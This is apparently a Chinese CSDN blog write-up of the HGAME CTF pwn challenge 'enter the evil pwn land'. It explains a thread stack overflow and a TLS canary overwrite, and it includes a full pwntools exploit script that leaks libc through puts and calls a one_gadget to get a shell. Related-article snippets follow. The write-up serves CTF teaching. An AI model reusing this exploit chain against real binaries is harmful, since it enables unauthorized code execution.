HGAME enter the evil pwn land

最新推荐文章于 2024-07-17 09:15:39 发布
最新推荐文章于 2024-07-17 09:15:39 发布
阅读量678 收藏
点赞数
文章标签: 网络安全 python 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_62172019/article/details/131645055
版权

老规矩用IDA打开题目
在这里插入图片描述
题目使用了pthread_create创建函数pthread_join用于阻塞线程等待子线程完成
漏洞点在于test_thread函数中
在这里插入图片描述
明显的栈溢出
观察可得canary固定
在这里插入图片描述

这里要注意的是如果想用常规的puts泄露得到canary(即:覆盖一位通过puts带出来,会使子线程崩溃)由于main调用了pthread_join函数等待线程被等待的线程崩溃也会导致整个程序崩溃所以不可取。每个线程的创建都拥有一个线程局部变量结构体用于存储线程的信息即TLS canary也是一样又因为题目提供的可输入字符的数量够大可以覆盖到TLS所以我们可以利用栈溢出修改canary来实现绕过。
在这里插入图片描述
计算可得缓冲区到canary的偏移为0x870
之后就是简单的rop了

from pwn import *
p = process("./pwn")
libc = ELF('/lib/x86_64-linux-gnu/libc.so.6')
elf = ELF("./pwn")
def gd():
 gdb.attach(p)
 pause()
#gd()
ret_addr = 0x000000000040101a
pop_rsi = 0x0000000000401361
pop_rdi = 0x0000000000401363
bss_addr = 0x404060
vuln_addr = 0x00000000004011D6
puts_addr = elf.plt['puts']
payload = b'a' * 0x38 + p64(pop_rdi) + p64(elf.got['puts']) + p64(puts_addr) + p64(vuln_addr)
payload = payload.ljust(0x870,b'a')
p.sendline(payload)
p.recvuntil(b'a' * 0x38)
p.recvline()
libc_base = u64(p.recv(6).ljust(8,b'\x00')) - libc.sym['puts']
print(hex(libc_base))
one_shot = libc_base + 0xe3afe
pop_rdx_r12 = libc_base + 0x0000000000119211
pop_rsp_r13_r15 = libc_base + 0x00000000000ef195
print(hex(one_shot))
#gd()
p.sendline(b'a' * 0x38 + p64(pop_rdx_r12) + p64(0) * 2  + p64(pop_rsi) + p64(0) * 2+ p64(one_shot))
p.interactive()

成功拿到权限

在这里插入图片描述

萌の鱼
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
2022 hgame pwn wp
weixin_45209963的博客
03-27 4687
2022 hgame pwn wp 本来早就写好了,但是由于复试毕设等等原因拖到今天才发 包括了绝大部分题目,除了算法题spfa和bpwn,剩下一些简单题懒得写了orz 文章目录2022 hgame pwn wpWeek 1enter_the_pwn_landenter_the_evil_pwn_landoldfashion_orwWeek 2oldfashion_noteechoWeek 3changeable_noteelder_notesized_noteWeek 4vector Week 1 ent
我对HGAME的看法(GalGame
大师的资源
02-15 9518
堕落了,居然下载18禁的GalGame顺便谈谈我对 HGAME的看法HGAME,我也局限于studio e go的游戏更准确地说是18禁的GalGame(美少女游戏)看看网上:切随便找个 GAL 游戏美女都多的要不成 GAL全是H的 日本游戏没H的少死了 在日本大家都玩PS PC游戏市场都被H的占领了 所以PC游戏就是HGAME 想玩HGAME 就说嘛(http://zhidao.baid
hgame是什么?【详解】 【我们不能光玩game,而不了解game的文化】
热门推荐
FreeXploiT
05-15 1万+
allyesno:今天偶闻hgame资深人士swan对hgame的言论 [12:23] 最开始的那种游戏,出现图片的时候你要按h键才能往下显示[12:24] 后来就用h-game代替了[12:24] 然后发展到hentai[12:24] 这个是日文变态的意思~嘿嘿,不过是现有h才有hentai的下面我们来看看一篇更详细的说明 希望对大家以后提高玩hgame的水平有帮助H-gam
hgame:Haskell 游戏引擎
05-30
游戏 Haskell 游戏引擎
PWN-COMPETITION-HGAME2022-Week1
P1umH0的博客
01-28 1252
PWN-COMPETITION-HGAME2022Week1enter_the_pwn_landenter_the_evil_pwn_landoldfashion_orw(unsolved)ser_per_fa(unsol)test_your_nctest_your_gdb Week1 enter_the_pwn_land 栈溢出,需要注意的是下标 i 的地址比输入s的地址更高 s溢出会覆盖 i ,于是需要小心地覆写 i 的值,让循环顺利执行下去 然后就是常规的ret2libc # -*- coding:
HGAME cdcollector-开源
04-24
【标题】"HGAME cdcollector-开源"是一个针对游戏收藏管理者的开源项目,它扩展了原有的cdcollector系统,特别设计用于管理和记录大量的电子游戏数据,尤其是HGAME(可能指的是成人向游戏)的数据库。这个系统利用...
0hgame:用0h制作的游戏->阅读README
05-01
)2- DO NOT TOUCH BLACK THINGS IF YOU DONT WANT TO START AGAIN3- Try to reach the other side of the window to became the king of the penguins4- Enjoy it. (it is a rule, so if you are not enjoying the ...
vm虚拟机-简单题目(hgame-week4-easyvm、cg-ctf wxyVM1/2
01-08
然后先写了前面的cg-ctf的两个题目,其实当时做的时候还没太大虚拟机的感觉,后面接触到hgame的题目,然后再看的时候就感觉到有些那个意思,但是两个题目是基础题目也就不是太难为人,看成数据处理的考点也做的出来...
html5game.co.kr:添加基本​​文件
07-01
HTML5游戏开发是一个充满活力的领域,特别是在JavaScript的加持下,开发者可以构建出跨平台、交互性强的游戏。... ... ...它是一门轻量级的脚本语言,易于学习且支持事件驱动和函数式编程。...开发者可以通过DOM(文档对象模型...
HGAME-WEEK2-WRITE-UP
郁离歌丶的博客
03-09 5159
HGAME-WEEK2-WRITE-UPwebRandom?vim在线改代码导致源码泄露。读一下random.php.swp发现关键代码$emmm =unserialize(serialize($a));if(!is_object( $emmm)) {die("error") ;}$emmm->public = random_int(0,100000000);$emmm->secret...
3D模型和图像查看器
10-27
简单易用,晶莹剔透的3D模型和图像查看器。目前支持的格式有: .3DS、.OBJ、.LWO、.MD2、.MD3、.MS3D、.X、.B3D、.STL 、.PLY、.DAE、.TER; .JPG、.PNG、.GIF、.BMP、.TGA、.DDS、.DIB、.HDR、.PFM、.PPM、.PCX、.ICO、.CUR、WBMP、TIF。
SuperModel(3D图像查看器) v25.0.zip
07-10
SuperModel(3D图像查看器) v25.0更新: 1. 大幅度更新了界面 2. 解决了其它一些琐碎的BUG SuperModel是一款简单易用,晶莹剔透的3D模型和图像查看器。 SuperModel目前支持的格式有: .3DS、.OBJ、.MD2、.MD3、.MS3D、.X; .JPG、.PNG、.GIF、.BMP、.TGA、.DDS、.DIB、.HDR、.PFM、.PPM、.PCX、.ICO、.CUR、WBMP、TIF。
如何卸载Android自带系统应用
zhaojun的博客
02-05 1万+
2022年年底,小米正式发布了MIUI14,说MIUI14可以删除8个核心应用以外的所有应用。然而我更新MIUI14后,并不像说的那样,再一次被当猴耍了。转念一想,国产的room怎么会做到这么良心呢?
android平台gallery2应用分析,Android5.1图库Gallery2代码分析数据加载流程
weixin_33994823的博客
05-25 798
图片数据加载流程。Gallery---->GalleryActivity------>AlbumSetPage------->AlbumPage--------->PhotoPage相册集 照片集 某张图片1,AlbumSetPage.javaprivate void initializeData...
Android Gallery图片显示和文字提示及Menu 菜单
weixin_30826761的博客
06-21 254
Gallery组件主要用于横向显示图像列表,不过按常规做法。Gallery组件只能有限地显示指定的图像。也就是说,如果为Gallery组件指定了10张图像,那么当Gallery组件显示到第10张时,就不会再继续显示了。 代码里带注释,欢迎相互讨论 Layout里的main.xml文件: <?xml version="1.0" encoding="utf-8"?> <Rel...
HGAME 2020 week1
Slightwind's Blog
04-23 2186
week1 Web Cosmos 的博客 1.看提示去 GitHub 上找这个网站的源代码,搜索 Cosmos Hgame 就可以找到,点开 3 commits,点开 new file 就可以看到: base64 解码: aGdhbWV7ZzF0X2xlQGtfMXNfZGFuZ2VyMHVzXyEhISF9 2.base64 解码得到 flag。 hgame{g1t_le@k_1s_dange...
一文解读,网络安全行业人才需求情况《网络安全产业人才发展报告》
weixin_59086772的博客
10-18 8339
随着近几天国家网络安全宣传周在全国各地开展活动,网络安全再一次成为热门话题。网络安全不再缩在小小的安全圈子里,惠及面越来越广。不少对网络安全颇有兴趣的朋友非常关心行业前景如何?该怎么提升自我能力,更快地加入网安行列。 今天雨笋君就10月13日在网络安全宣传周上发布的《2021网络安全人才报告》进行一个简单的行业前景分析。 一、网络安全行业市场发展情况 网络时代生活越来越离不开网络,与此同时发生的网络安全攻击事件、非法入侵等等一系列事件都威胁着普通人的生活。没有网络安全保障,个人和企业等重.
《JavaSE》---6.<基础语法(Java三大程序控制结构)>
m0_73456341的博客
07-14 829
本篇博客主要讲解Java基础语法中的三大结构,一种顺序结构、两大分支结构i(if-else、swich-case)、四大循环结构(while、do while、fot、foreach)
华为od机试真题 — 代表团坐车(Python)
最新发布
学习,你不是一个人在战斗 ~ 961302305(QQ,微信)
07-17 560
【华为od机试真题 】代表团坐车(Python) 某组织举行会议,来了多个代表团同时到达,接待处只有一辆汽车可以同时接待多个代表团,为了提高车辆利用率,请帮接待员计算可以坐满车的接待方案输出方案数量。
堆溢出漏洞利用: EldenRingFinal 中的_hgame2024_off_by_one攻击
本周四的hgame2024官方题解涉及一个Pwn挑战,题目是关于利用堆溢出漏洞实现任意写入并泄露libc库的内存地址,进而获取shell。出题思路主要围绕以下几个关键步骤: 1. **漏洞利用原理**: 题目利用的是off_by_one...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值